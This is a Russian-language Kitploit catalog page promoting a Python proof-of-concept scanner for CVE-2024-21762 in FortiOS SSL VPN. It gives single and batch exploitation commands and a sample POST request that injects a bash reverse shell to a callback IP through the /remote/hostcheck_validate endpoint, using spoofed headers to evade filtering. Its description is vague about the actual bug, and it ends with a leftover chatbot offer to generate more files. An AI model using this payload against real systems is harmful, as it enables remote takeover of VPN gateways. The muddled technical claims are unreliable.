Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-21762_FortiNet_PoC — Сканер proof-of-concept, нацеленный на CVE-2024-21762 в конечной точке /remote/hostcheck_validate SSL VPN FortiOS, с доставкой полезной нагрузки обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

Сканер proof-of-concept, нацеленный на CVE-2024-21762 в конечной точке /remote/hostcheck_validate SSL VPN FortiOS, с доставкой полезной нагрузки обратной оболочки.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
211 год назадЕщё не проверено

CVE-2024-21762_FortiNet_PoC

Сканер для проверки концепции (PoC), нацеленный на CVE-2024-21762 в конечной точке /remote/hostcheck_validate SSL VPN FortiOS, с доставкой полезной нагрузки обратной оболочки (reverse shell).

Вот запись в стиле GitHub для вашего проекта, включая чистую и краткую сводку, руководство по использованию и контекст того, как это соотносится с CVE.


🔥 Название проекта: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 Краткое описание (для строки описания GitHub):

Сканер для проверки концепции (PoC), нацеленный на CVE-2024-21762 в конечной точке /remote/hostcheck_validate SSL VPN FortiOS, с доставкой полезной нагрузки обратной оболочки (reverse shell).


📜 Обзор

Этот скрипт на Python — инструмент для проверки концепции (PoC), предназначенный для взаимодействия с интерфейсом SSL VPN Fortinet FortiOS, нацеленный на CVE-2024-21762 — переполнение буфера в стеке или внедрение команд в конечной точке /remote/hostcheck_validate.

Предупреждение: Это предназначено только для образовательных целей и разрешённого тестирования.


🧬 Как это работает

  • Отправляет сформированный POST-запрос к /remote/hostcheck_validate на интерфейсе SSL VPN FortiGate.
  • Внедряет полезную нагрузку bash reverse shell в моделируемый уязвимый параметр (host).
  • Использует поддельные заголовки (User-Agent, Cookie) для обхода поверхностной фильтрации запросов FortiOS.
  • Получает и записывает ответы сервера для оценки успешности эксплуатации.
  • Поддерживает одиночный или пакетный режимы тестирования с автоматизацией ввода/вывода файлов и индикаторами прогресса.

🛠️ Возможности

  • 🧪 Внедрение полезной нагрузки обратной оболочки через управляемое поле формы
  • 🧾 Полный захват HTTP-ответов для анализа (last_response.txt)
  • 📊 Индикатор прогресса для отслеживания в одиночном/пакетном режиме
  • 🗃️ Пакетный режим с поддержкой входных/выходных файлов
  • 🔄 Модульность и расширяемость

⚙️ Требования

  • Python 3.6+
  • tqdm для визуализации прогресса

Установка зависимостей:

root@kitploit:~
pip install tqdm

🚀 Использование

Одиночный режим

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

Пакетный режим

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt: Список целей в формате IP:PORT, по одной на строку
  • results.txt: Файл журнала попыток эксплуатации

📥 Пример отправленной полезной нагрузки

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 Журналы

Инструмент записывает полный HTTP-ответ каждой попытки в:

root@kitploit:~
last_response.txt

Используйте это для проверки, был ли запрос обработан, отклонён или возвращён код ошибки.


⚠️ Правовая информация

Этот код предоставляется только для образовательных целей и разрешённого тестирования. Не используйте его в сетях или системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


✍️ Автор

Carter — инженер по кибербезопасности, энтузиаст Red/Purple Team, фанат автоматизации PoC.


Хотите, чтобы это было упаковано в файл README.md + структура репозитория, готовые к публикации на GitHub? Я могу сгенерировать это дальше.

Скачать инструмент